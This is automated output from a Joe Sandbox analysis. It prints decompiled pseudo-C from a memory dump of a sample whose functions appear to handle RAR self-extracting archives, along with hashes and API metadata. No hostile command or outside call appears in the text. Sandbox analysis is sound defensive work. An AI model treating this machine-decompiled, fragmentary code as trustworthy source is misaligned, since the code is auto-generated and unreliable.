                                                    							__eflags =  *_t38;
                                                    							E00CC15FB(_t182); // executed
                                                    							L26:
                                                    							_t111 =  *(_t167 + 0x6cc8);
                                                    							_t234 = _t111 - 4;
                                                    							if(_t111 != 4) {
                                                    								__eflags = _t111 - 3;
                                                    								if(_t111 != 3) {
                                                    									L32:
                                                    									 *((intOrPtr*)(_t167 + 0x2218)) = _t212;
                                                    									 *((char*)(_t226 - 0xd)) = 0;
                                                    									_t113 = E00CC3B2D(_t167, _t210, _t220);
                                                    									__eflags = _t113;
                                                    									 *((char*)(_t226 - 0xe)) = _t113 != 0;
                                                    									__eflags = _t113;
                                                    									if(_t113 == 0) {
                                                    										L38:
                                                    										_t114 =  *((intOrPtr*)(_t226 - 0xd));
                                                    										L39:
                                                    										_t184 =  *((intOrPtr*)(_t167 + 0x6cdd));
                                                    										__eflags = _t184;
                                                    										if(_t184 == 0) {
                                                    											L41:
                                                    											__eflags =  *((char*)(_t167 + 0x6cdc));
                                                    											if( *((char*)(_t167 + 0x6cdc)) != 0) {
                                                    												L43:
                                                    												__eflags = _t184;
                                                    												if(__eflags == 0) {
                                                    													E00CC138B(__eflags, 0x1b, _t167 + 0x32);
                                                    												}
                                                    												__eflags =  *((char*)(_t226 + 8));
                                                    												if( *((char*)(_t226 + 8)) == 0) {
                                                    													goto L23;
                                                    												} else {
                                                    													L46:
                                                    													__eflags =  *((char*)(_t226 - 0xe));
                                                    													 *((char*)(_t167 + 0x6cce)) =  *((intOrPtr*)(_t167 + 0x223c));
                                                    													if( *((char*)(_t226 - 0xe)) == 0) {
                                                    														L69:
                                                    														__eflags =  *((char*)(_t167 + 0x6ccd));
                                                    														if( *((char*)(_t167 + 0x6ccd)) == 0) {
                                                    															L71:
                                                    															E00CD0602(_t167 + 0x6d12, _t167 + 0x32, 0x800);
                                                    															L72:
                                                    															_t101 = 1;
                                                    															goto L24;
                                                    														}
                                                    														__eflags =  *((char*)(_t167 + 0x6cd1));
                                                    														if( *((char*)(_t167 + 0x6cd1)) == 0) {
                                                    															goto L72;
                                                    														}
                                                    														goto L71;
                                                    													}
                                                    													__eflags =  *((char*)(_t167 + 0x21f8));
                                                    													if( *((char*)(_t167 + 0x21f8)) == 0) {
                                                    														L49:
                                                    														__eflags =  *((intOrPtr*)(_t167 + 0x10)) - 1;
                                                    														if( *((intOrPtr*)(_t167 + 0x10)) == 1) {
                                                    															goto L69;
                                                    														}
                                                    														 *0xcf3278();
                                                    														_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
                                                    														_t224 = _t119;
                                                    														_t214 = _t210;
                                                    														 *((intOrPtr*)(_t226 - 0x18)) =  *((intOrPtr*)(_t167 + 0x6cb8));
                                                    														 *(_t226 - 0x14) =  *(_t167 + 0x6cbc);
                                                    														 *((intOrPtr*)(_t226 - 0x1c)) =  *((intOrPtr*)(_t167 + 0x6cc0));
                                                    														 *((intOrPtr*)(_t226 - 0x20)) =  *((intOrPtr*)(_t167 + 0x6cc4));
                                                    														 *((intOrPtr*)(_t226 - 0x24)) =  *((intOrPtr*)(_t167 + 0x21f4));
                                                    														while(1) {
                                                    															_t125 = E00CC3B2D(_t167, _t210, _t224);
                                                    															__eflags = _t125;
                                                    															if(_t125 == 0) {
                                                    																break;
                                                    															}
                                                    															_t126 =  *((intOrPtr*)(_t167 + 0x21f4));
                                                    															__eflags = _t126 - 3;
                                                    															if(_t126 != 3) {
                                                    																__eflags = _t126 - 2;
                                                    																if(_t126 == 2) {
                                                    																	__eflags =  *((char*)(_t167 + 0x6ccd));
                                                    																	if( *((char*)(_t167 + 0x6ccd)) == 0) {
                                                    																		L66:
                                                    																		_t127 = 0;
                                                    																		__eflags = 0;
                                                    																		L67:
                                                    																		 *((char*)(_t167 + 0x6cd1)) = _t127;
                                                    																		L68:
                                                    																		 *((intOrPtr*)(_t167 + 0x6cb8)) =  *((intOrPtr*)(_t226 - 0x18));
                                                    																		 *(_t167 + 0x6cbc) =  *(_t226 - 0x14);
                                                    																		 *((intOrPtr*)(_t167 + 0x6cc0)) =  *((intOrPtr*)(_t226 - 0x1c));
                                                    																		 *((intOrPtr*)(_t167 + 0x6cc4)) =  *((intOrPtr*)(_t226 - 0x20));
                                                    																		 *((intOrPtr*)(_t167 + 0x21f4)) =  *((intOrPtr*)(_t226 - 0x24));
                                                    																		 *0xcf3278(_t224, _t214, 0);
                                                    																		 *( *( *_t167 + 0x10))();
                                                    																		goto L69;
                                                    																	}
                                                    																	__eflags =  *((char*)(_t167 + 0x3330));
                                                    																	if( *((char*)(_t167 + 0x3330)) != 0) {
                                                    																		goto L66;
                                                    																	}
                                                    																	_t127 = 1;
                                                    																	goto L67;
                                                    																}
                                                    																__eflags = _t126 - 5;
                                                    																if(_t126 == 5) {
                                                    																	goto L68;
                                                    																}
                                                    																L60:
                                                    																E00CC1F47(_t167);
                                                    																continue;
                                                    															}
                                                    															__eflags =  *((char*)(_t167 + 0x6ccd));
                                                    															if( *((char*)(_t167 + 0x6ccd)) == 0) {
                                                    																L56:
                                                    																_t137 = 0;
                                                    																__eflags = 0;
                                                    																L57:
                                                    																 *((char*)(_t167 + 0x6cd1)) = _t137;
                                                    																goto L60;
                                                    															}
                                                    															__eflags =  *((char*)(_t167 + 0x5680));
                                                    															if( *((char*)(_t167 + 0x5680)) != 0) {
                                                    																goto L56;
                                                    															}
                                                    															_t137 = 1;
                                                    															goto L57;
                                                    														}
                                                    														goto L68;
                                                    													}
                                                    													__eflags =  *((char*)(_t167 + 0x6cd4));
                                                    													if( *((char*)(_t167 + 0x6cd4)) != 0) {
                                                    														goto L69;
                                                    													}
                                                    													goto L49;
                                                    												}
                                                    											}
                                                    											__eflags = _t114;
                                                    											if(_t114 != 0) {
                                                    												goto L46;
                                                    											}
                                                    											goto L43;
                                                    										}
                                                    										__eflags =  *((char*)(_t226 + 8));
                                                    										if( *((char*)(_t226 + 8)) == 0) {
                                                    											goto L23;
                                                    										}
                                                    										goto L41;
                                                    									}
                                                    									__eflags = 0;
                                                    									 *((char*)(_t226 - 0xd)) = 0;
                                                    									while(1) {
                                                    										E00CC1F47(_t167);
                                                    										_t142 =  *((intOrPtr*)(_t167 + 0x21f4));
                                                    										__eflags = _t142 - 1;
                                                    										if(_t142 == 1) {
                                                    											break;
                                                    										}
                                                    										__eflags =  *((char*)(_t167 + 0x21f8));
                                                    										if( *((char*)(_t167 + 0x21f8)) == 0) {
                                                    											L37:
                                                    											_t143 = E00CC3B2D(_t167, _t210, _t220);
                                                    											__eflags = _t143;
                                                    											 *((char*)(_t226 - 0xe)) = _t143 != 0;
                                                    											__eflags = _t143;
                                                    											if(_t143 != 0) {
                                                    												continue;
                                                    											}
                                                    											goto L38;
                                                    										}
                                                    										__eflags = _t142 - 4;
                                                    										if(_t142 == 4) {
                                                    											break;
                                                    										}
                                                    										goto L37;
                                                    									}
                                                    									_t114 = 1;
                                                    									goto L39;
                                                    								}
                                                    								_t215 = _t167 + 0x2217;
                                                    								_t220 =  *( *_t167 + 0xc);
                                                    								 *0xcf3278(_t215, 1);
                                                    								_t146 =  *( *( *_t167 + 0xc))();
                                                    								__eflags = _t146 - 1;
                                                    								if(_t146 != 1) {
                                                    									goto L23;
                                                    								}
                                                    								__eflags =  *_t215;
                                                    								if( *_t215 != 0) {
                                                    									goto L23;
                                                    								}
                                                    								_t212 = 8;
                                                    								goto L32;
                                                    							}
                                                    							E00CC138B(_t234, 0x3c, _t167 + 0x32);
                                                    							goto L23;
                                                    						}
                                                    						E00CC15FB(_t182);
                                                    						goto L23;
                                                    					} else {
                                                    						goto L5;
                                                    					}
                                                    					do {
                                                    						L5:
                                                    						_t198 =  *((intOrPtr*)(_t226 - 0x38)) + _t220;
                                                    						__eflags =  *_t198 - 0x52;
                                                    						if( *_t198 != 0x52) {
                                                    							goto L16;
                                                    						}
                                                    						_t151 = E00CC1DF8(_t198, _t109 - _t220);
                                                    						__eflags = _t151;
                                                    						if(_t151 == 0) {
                                                    							L15:
                                                    							_t109 =  *(_t226 - 0x14);
                                                    							goto L16;
                                                    						}
                                                    						_t199 =  *((intOrPtr*)(_t226 - 0x18));
                                                    						 *(_t167 + 0x6cc8) = _t151;
                                                    						__eflags = _t151 - 1;
                                                    						if(_t151 != 1) {
                                                    							L18:
                                                    							_t200 = _t199 + _t220;
                                                    							 *(_t167 + 0x6cd8) = _t200;
                                                    							_t220 =  *( *_t167 + 0x10);
                                                    							 *0xcf3278(_t200, 0, 0);
                                                    							 *( *( *_t167 + 0x10))();
                                                    							_t155 =  *(_t167 + 0x6cc8);
                                                    							__eflags = _t155 - 2;
                                                    							if(_t155 == 2) {
                                                    								L20:
                                                    								_t220 =  *( *_t167 + 0xc);
                                                    								 *0xcf3278(_t167 + 0x2210, _t212);
                                                    								 *( *( *_t167 + 0xc))();
                                                    								goto L21;
                                                    							}
                                                    							__eflags = _t155 - 3;
                                                    							if(_t155 != 3) {
                                                    								goto L21;
                                                    							}
                                                    							goto L20;
                                                    						}
                                                    						__eflags = _t220;
                                                    						if(_t220 <= 0) {
                                                    							goto L18;
                                                    						}
                                                    						__eflags = _t199 - 0x1c;
                                                    						if(_t199 >= 0x1c) {
                                                    							goto L18;
                                                    						}
                                                    						__eflags =  *(_t226 - 0x14) - 0x1f;
                                                    						if( *(_t226 - 0x14) <= 0x1f) {
                                                    							goto L18;
                                                    						}
                                                    						_t160 =  *((intOrPtr*)(_t226 - 0x38)) - _t199;
                                                    						__eflags =  *((char*)(_t160 + 0x1c)) - 0x52;
                                                    						if( *((char*)(_t160 + 0x1c)) != 0x52) {
                                                    							goto L15;
                                                    						}
                                                    						__eflags =  *((char*)(_t160 + 0x1d)) - 0x53;
                                                    						if( *((char*)(_t160 + 0x1d)) != 0x53) {
                                                    							goto L15;
                                                    						}
                                                    						__eflags =  *((char*)(_t160 + 0x1e)) - 0x46;
                                                    						if( *((char*)(_t160 + 0x1e)) != 0x46) {
                                                    							goto L15;
                                                    						}
                                                    						__eflags =  *((char*)(_t160 + 0x1f)) - 0x58;
                                                    						if( *((char*)(_t160 + 0x1f)) == 0x58) {
                                                    							goto L18;
                                                    						}
                                                    						goto L15;
                                                    						L16:
                                                    						_t220 = _t220 + 1;
                                                    						__eflags = _t220 - _t109;
                                                    					} while (_t220 < _t109);
                                                    					goto L21;
                                                    				}
                                                    				 *(_t167 + 0x6cc8) = _t103;
                                                    				if(_t103 == 1) {
                                                    					_t216 =  *_t167;
                                                    					_t220 =  *(_t216 + 0x14);
                                                    					 *0xcf3278(0);
                                                    					_t162 =  *( *(_t216 + 0x14))();
                                                    					asm("sbb edx, 0x0");
                                                    					 *0xcf3278(_t162 - 7, __edx);
                                                    					 *((intOrPtr*)(_t216 + 0x10))();
                                                    					_t212 = 7;
                                                    				}
                                                    				goto L26;
                                                    			}

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: da159a52be39d04608ee1f948dff12dd1367f39e6f53f1ebbde849830dd69ecf
                                                    • Instruction ID: eb19185973fdd5c588a98da5b24f985494a3e7ba84f642030a8cf9d88e375000
                                                    • Opcode Fuzzy Hash: da159a52be39d04608ee1f948dff12dd1367f39e6f53f1ebbde849830dd69ecf
                                                    • Instruction Fuzzy Hash: 1FC19170A00254ABEF15DF6AC494FA97BA5AF06310F0C01BDEC569B297DB309E44CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 90%
                                                    			E00CC3BBA(void* __ecx) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				char _t79;
                                                    				signed int _t86;
                                                    				intOrPtr _t91;
                                                    				intOrPtr _t96;
                                                    				void* _t124;
                                                    				char _t125;
                                                    				intOrPtr _t133;
                                                    				signed int _t135;
                                                    				intOrPtr _t149;
                                                    				signed int _t152;
                                                    				void* _t155;
                                                    				void* _t157;
                                                    
                                                    				E00CDEB78(0xcf26da, _t157);
                                                    				E00CDEC50(0xe6e0);
                                                    				_t155 = __ecx;
                                                    				_t160 =  *((char*)(__ecx + 0x6cdc));
                                                    				if( *((char*)(__ecx + 0x6cdc)) == 0) {
                                                    					__eflags =  *((char*)(__ecx + 0x4608)) - 5;
                                                    					if(__eflags > 0) {
                                                    						L26:
                                                    						E00CC138B(__eflags, 0x1e, _t155 + 0x32);
                                                    						goto L27;
                                                    					}
                                                    					__eflags =  *((intOrPtr*)(__ecx + 0x6cc8)) - 3;
                                                    					__eflags =  *((intOrPtr*)(__ecx + 0x4604)) - ((0 |  *((intOrPtr*)(__ecx + 0x6cc8)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
                                                    					if(__eflags > 0) {
                                                    						goto L26;
                                                    					}
                                                    					_t86 =  *(__ecx + 0x5640) |  *(__ecx + 0x5644);
                                                    					__eflags = _t86;
                                                    					if(_t86 != 0) {
                                                    						L7:
                                                    						_t124 = _t155 + 0x20f8;
                                                    						E00CCCFD4(_t86, _t124);
                                                    						_push(_t124);
                                                    						E00CD2089(_t157 - 0xe6ec, __eflags);
                                                    						_t125 = 0;
                                                    						_push(0);
                                                    						_push( *((intOrPtr*)(_t155 + 0x56dc)));
                                                    						 *((intOrPtr*)(_t157 - 4)) = 0;
                                                    						E00CD3377(0, _t157 - 0xe6ec);
                                                    						_t152 =  *(_t157 + 8);
                                                    						__eflags =  *(_t157 + 0xc);
                                                    						if( *(_t157 + 0xc) != 0) {
                                                    							L15:
                                                    							__eflags =  *((intOrPtr*)(_t155 + 0x5683)) - _t125;
                                                    							if( *((intOrPtr*)(_t155 + 0x5683)) == _t125) {
                                                    								L18:
                                                    								E00CCAB1A(_t155 + 0x21b8, _t149,  *((intOrPtr*)(_t155 + 0x5658)), 1);
                                                    								_t133 =  *((intOrPtr*)(_t155 + 0x5644));
                                                    								_t91 =  *((intOrPtr*)(_t155 + 0x5640));
                                                    								 *((intOrPtr*)(_t155 + 0x2124)) = _t133;
                                                    								 *((intOrPtr*)(_t155 + 0x211c)) = _t133;
                                                    								 *((intOrPtr*)(_t155 + 0x2120)) = _t91;
                                                    								 *((intOrPtr*)(_t155 + 0x2118)) = _t91;
                                                    								 *((char*)(_t155 + 0x2128)) = _t125;
                                                    								E00CCD099(_t155 + 0x20f8, _t155,  *(_t157 + 0xc));
                                                    								 *((char*)(_t155 + 0x2129)) =  *((intOrPtr*)(_t157 + 0x10));
                                                    								 *((char*)(_t155 + 0x214f)) =  *((intOrPtr*)(_t155 + 0x5681));
                                                    								 *((intOrPtr*)(_t155 + 0x2138)) = _t155 + 0x45e8;
                                                    								 *((intOrPtr*)(_t155 + 0x213c)) = _t125;
                                                    								_t96 =  *((intOrPtr*)(_t155 + 0x5648));
                                                    								_t135 =  *(_t155 + 0x564c);
                                                    								 *((intOrPtr*)(_t157 - 0x9aa4)) = _t96;
                                                    								 *(_t157 - 0x9aa0) = _t135;
                                                    								 *((char*)(_t157 - 0x9a8c)) = _t125;
                                                    								__eflags =  *((intOrPtr*)(_t155 + 0x4608)) - _t125;
                                                    								if(__eflags != 0) {
                                                    									E00CD3020(_t157 - 0xe6ec,  *((intOrPtr*)(_t155 + 0x4604)), _t125);
                                                    								} else {
                                                    									_push(_t135);
                                                    									_push(_t96);
                                                    									_push(_t155 + 0x20f8); // executed
                                                    									E00CC9215(_t125, _t152, __eflags); // executed
                                                    								}
                                                    								asm("sbb eax, eax");
                                                    								__eflags = E00CCAAEA(_t125, _t155 + 0x21b8, _t155 + 0x5658,  ~( *(_t155 + 0x56b2) & 0x000000ff) & _t155 + 0x000056b3);
                                                    								if(__eflags != 0) {
                                                    									_t125 = 1;
                                                    								} else {
                                                    									E00CC2021(__eflags, 0x1f, _t155 + 0x32, _t155 + 0x4610);
                                                    									E00CC6D83(0xd01098, 3);
                                                    									__eflags = _t152;
                                                    									if(_t152 != 0) {
                                                    										E00CC3EDE(_t152);
                                                    									}
                                                    								}
                                                    								L25:
                                                    								E00CD2297(_t157 - 0xe6ec, _t152, _t155);
                                                    								_t79 = _t125;
                                                    								goto L28;
                                                    							}
                                                    							_t149 =  *((intOrPtr*)(_t155 + 0x21d4));
                                                    							__eflags =  *((intOrPtr*)(_t149 + 0x6124)) - _t125;
                                                    							if( *((intOrPtr*)(_t149 + 0x6124)) == _t125) {
                                                    								goto L25;
                                                    							}
                                                    							asm("sbb ecx, ecx");
                                                    							_t144 =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
                                                    							__eflags =  ~( *(_t155 + 0x5688) & 0x000000ff) & _t155 + 0x00005689;
                                                    							E00CCD051(_t155 + 0x20f8, _t125,  *((intOrPtr*)(_t155 + 0x5684)), _t149 + 0x6024, _t144, _t155 + 0x5699,  *((intOrPtr*)(_t155 + 0x56d4)), _t155 + 0x56b3, _t155 + 0x56aa);
                                                    							goto L18;
                                                    						}
                                                    						__eflags =  *(_t155 + 0x564c);
                                                    						if(__eflags < 0) {
                                                    							L12:
                                                    							__eflags = _t152;
                                                    							if(_t152 != 0) {
                                                    								E00CC20BD(_t152,  *((intOrPtr*)(_t155 + 0x5648)));
                                                    								E00CCD0B6(_t155 + 0x20f8,  *_t152,  *((intOrPtr*)(_t155 + 0x5648)));
                                                    							} else {
                                                    								 *((char*)(_t155 + 0x2129)) = 1;
                                                    							}
                                                    							goto L15;
                                                    						}
                                                    						if(__eflags > 0) {
                                                    							L11:
                                                    							E00CC138B(__eflags, 0x1e, _t155 + 0x32);
                                                    							goto L25;
                                                    						}
                                                    						__eflags =  *((intOrPtr*)(_t155 + 0x5648)) - 0x1000000;
                                                    						if(__eflags <= 0) {
                                                    							goto L12;
                                                    						}
                                                    						goto L11;
                                                    					}
                                                    					__eflags =  *((intOrPtr*)(__ecx + 0x5681)) - _t86;
                                                    					if( *((intOrPtr*)(__ecx + 0x5681)) != _t86) {
                                                    						goto L7;
                                                    					} else {
                                                    						_t79 = 1;
                                                    						goto L28;
                                                    					}
                                                    				} else {
                                                    					E00CC138B(_t160, 0x1d, __ecx + 0x32);
                                                    					E00CC6D83(0xd01098, 3);
                                                    					L27:
                                                    					_t79 = 0;
                                                    					L28:
                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
                                                    					return _t79;
                                                    				}
                                                    			}



















                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 946966ca5459b178296c2dfea588ab13204201a42ffd82299b6fcf83bcfd6acf
                                                    • Instruction ID: 88922e7829fd0fd1d6647ba81d6f341057ff1616b0077a60a8725d10167e6b95
                                                    • Opcode Fuzzy Hash: 946966ca5459b178296c2dfea588ab13204201a42ffd82299b6fcf83bcfd6acf
                                                    • Instruction Fuzzy Hash: B571F471500B849EDB35EB74D855FEBB7E9AF14300F40492EE2AB87242DA327A84DF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 90%
                                                    			E00CC8284(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
                                                    				void* __esi;
                                                    				char _t48;
                                                    				void* _t51;
                                                    				intOrPtr _t54;
                                                    				void* _t56;
                                                    				char _t58;
                                                    				signed int _t84;
                                                    				intOrPtr _t85;
                                                    				void* _t92;
                                                    				void* _t93;
                                                    				void* _t94;
                                                    				intOrPtr _t95;
                                                    				intOrPtr _t97;
                                                    				void* _t99;
                                                    				void* _t102;
                                                    
                                                    				_t102 = __eflags;
                                                    				_t94 = __edi;
                                                    				_t92 = __edx;
                                                    				E00CDEB78(0xcf2831, _t99);
                                                    				E00CDEC50(0x9d64);
                                                    				_t97 = __ecx;
                                                    				_t1 = _t99 - 0x9d70; // -38256
                                                    				_push( *((intOrPtr*)(__ecx + 8)));
                                                    				E00CC13DC(_t1, __edi, _t102);
                                                    				 *((intOrPtr*)(_t99 - 4)) = 0;
                                                    				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + 0x82de)) == 0) {
                                                    					_t8 = _t99 - 0x9d70; // -38256
                                                    					_t48 = E00CC9F42(_t8, __edi, __ecx, __ecx + 0xfe);
                                                    					__eflags = _t48;
                                                    					if(_t48 != 0) {
                                                    						goto L3;
                                                    					}
                                                    				} else {
                                                    					 *((intOrPtr*)(_t99 - 0x9d60)) = 1;
                                                    					L3:
                                                    					_t9 = _t99 - 0x9d70; // -38256, executed
                                                    					_t51 = E00CC1A04(_t9, _t92, 1); // executed
                                                    					if(_t51 != 0) {
                                                    						__eflags =  *((intOrPtr*)(_t99 - 0x3093));
                                                    						if( *((intOrPtr*)(_t99 - 0x3093)) == 0) {
                                                    							_push(_t94);
                                                    							_t95 = 0;
                                                    							__eflags =  *((intOrPtr*)(_t99 - 0x30a3));
                                                    							if(__eflags != 0) {
                                                    								_t12 = _t99 - 0x9d3e; // -38206
                                                    								_t13 = _t99 - 0x1010; // -2064
                                                    								_t65 = E00CD0602(_t13, _t12, 0x800);
                                                    								__eflags =  *((intOrPtr*)(_t99 - 0x309e));
                                                    								while(1) {
                                                    									_t19 = _t99 - 0x1010; // -2064
                                                    									E00CCC0C5(_t19, 0x800, (_t65 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
                                                    									_t20 = _t99 - 0x2058; // -6232
                                                    									E00CC6EDB(_t20);
                                                    									_push(0);
                                                    									_t21 = _t99 - 0x2058; // -6232
                                                    									_t22 = _t99 - 0x1010; // -2064
                                                    									__eflags = E00CCA56D(_t20, __eflags, _t22, _t21);
                                                    									if(__eflags == 0) {
                                                    										break;
                                                    									}
                                                    									_t95 = _t95 +  *((intOrPtr*)(_t99 - 0x1058));
                                                    									asm("adc ebx, [ebp-0x1054]");
                                                    									__eflags =  *((char*)(_t99 - 0x309e));
                                                    								}
                                                    								 *((intOrPtr*)(_t97 + 0xa0)) =  *((intOrPtr*)(_t97 + 0xa0)) + _t95;
                                                    								asm("adc [esi+0xa4], ebx");
                                                    							}
                                                    							_t25 = _t99 - 0x9d70; // -38256
                                                    							E00CC8430(_t97, __eflags, _t25);
                                                    							_t54 =  *((intOrPtr*)(_t97 + 8));
                                                    							_t93 = 0x49;
                                                    							_pop(_t94);
                                                    							_t84 =  *(_t54 + 0x92fa) & 0x0000ffff;
                                                    							__eflags = _t84 - 0x54;
                                                    							if(_t84 == 0x54) {
                                                    								L13:
                                                    								 *((char*)(_t54 + 0x7201)) = 1;
                                                    							} else {
                                                    								__eflags = _t84 - _t93;
                                                    								if(_t84 == _t93) {
                                                    									goto L13;
                                                    								}
                                                    							}
                                                    							_t85 =  *((intOrPtr*)(_t97 + 8));
                                                    							__eflags =  *((intOrPtr*)(_t85 + 0x92fa)) - _t93;
                                                    							if( *((intOrPtr*)(_t85 + 0x92fa)) != _t93) {
                                                    								 *((char*)(_t85 + 0x7201)) =  *((char*)(_t85 + 0x7201)) == 0;
                                                    								E00CD1B66((_t97 + 0x000000fe & 0xffffff00 |  *((char*)(_t85 + 0x7201)) == 0x00000000) & 0x000000ff, _t97 + 0xfe);
                                                    							}
                                                    							_t35 = _t99 - 0x9d70; // -38256
                                                    							E00CC1F6D(_t35, _t93);
                                                    							do {
                                                    								_t36 = _t99 - 0x9d70; // -38256
                                                    								_t56 = E00CC3B2D(_t36, _t93, _t97);
                                                    								_t37 = _t99 - 0xd; // 0x7f3
                                                    								_t38 = _t99 - 0x9d70; // -38256
                                                    								_t58 = E00CC848E(_t97, _t38, _t56, _t37); // executed
                                                    								__eflags = _t58;
                                                    							} while (_t58 != 0);
                                                    						}
                                                    					} else {
                                                    						E00CC6D83(0xd01098, 1);
                                                    					}
                                                    				}
                                                    				_t39 = _t99 - 0x9d70; // -38256, executed
                                                    				E00CC1692(_t39, _t94, _t97); // executed
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t99 - 0xc));
                                                    				return 0;
                                                    			}



















                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC8289
                                                      • Part of subcall function 00CC13DC: __EH_prolog.LIBCMT ref: 00CC13E1
                                                      • Part of subcall function 00CCA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$CloseFind
                                                    • String ID:
                                                    • API String ID: 2506663941-0
                                                    • Opcode ID: 210a3948beb0032047df8deb4c587b6854df31f3bffd0854eaa7d74a52d346a2
                                                    • Instruction ID: db93f7dc26b58680f72aefad0ff2a1943e6d8ef8eb65cef43edc1a6dc1b94f1c
                                                    • Opcode Fuzzy Hash: 210a3948beb0032047df8deb4c587b6854df31f3bffd0854eaa7d74a52d346a2
                                                    • Instruction Fuzzy Hash: 8641D6719446589ADB24EBA0CC55FEAB7B8AF00304F0804EFE59A97193EB705FC9DB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E00CC13E1(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
                                                    				void* _t55;
                                                    				signed int _t61;
                                                    				char _t63;
                                                    				intOrPtr _t73;
                                                    				char _t82;
                                                    				void* _t87;
                                                    				intOrPtr _t89;
                                                    				void* _t91;
                                                    				void* _t96;
                                                    
                                                    				_t96 = __eflags;
                                                    				_t87 = __edi;
                                                    				E00CDEB78(_t55, _t91);
                                                    				_push(__ecx);
                                                    				_push(__ecx);
                                                    				_t89 = __ecx;
                                                    				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
                                                    				E00CC9556(__ecx);
                                                    				 *((intOrPtr*)(__ecx)) = 0xcf35f8;
                                                    				 *((intOrPtr*)(_t91 - 4)) = 0;
                                                    				E00CC5E37(__ecx + 0x1038, _t96);
                                                    				 *((char*)(_t91 - 4)) = 1;
                                                    				E00CCCE40(__ecx + 0x20f8, __edx, _t96);
                                                    				 *((intOrPtr*)(__ecx + 0x21e8)) = 0;
                                                    				 *((intOrPtr*)(__ecx + 0x21ec)) = 0;
                                                    				E00CC157A();
                                                    				_t61 = E00CC157A();
                                                    				_t82 =  *((intOrPtr*)(_t91 + 8));
                                                    				 *((char*)(_t91 - 4)) = 4;
                                                    				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
                                                    				 *((char*)(__ecx + 0x21d0)) = _t61 & 0xffffff00 | _t82 == 0x00000000;
                                                    				_t98 = _t82;
                                                    				if(_t82 != 0) {
                                                    					_t63 = _t82;
                                                    				} else {
                                                    					_push(0x92f0);
                                                    					_t73 = E00CDEB38(__edx, _t98);
                                                    					 *((intOrPtr*)(_t91 - 0x14)) = _t73;
                                                    					 *((char*)(_t91 - 4)) = 5;
                                                    					if(_t73 == 0) {
                                                    						_t63 = 0;
                                                    					} else {
                                                    						_t63 = E00CCB505(_t73); // executed
                                                    					}
                                                    				}
                                                    				 *((intOrPtr*)(_t89 + 0x21d4)) = _t63;
                                                    				 *(_t89 + 0x21d8) =  *(_t89 + 0x21d8) | 0xffffffff;
                                                    				 *(_t89 + 0x21dc) =  *(_t89 + 0x21dc) | 0xffffffff;
                                                    				 *(_t89 + 0x21e0) =  *(_t89 + 0x21e0) | 0xffffffff;
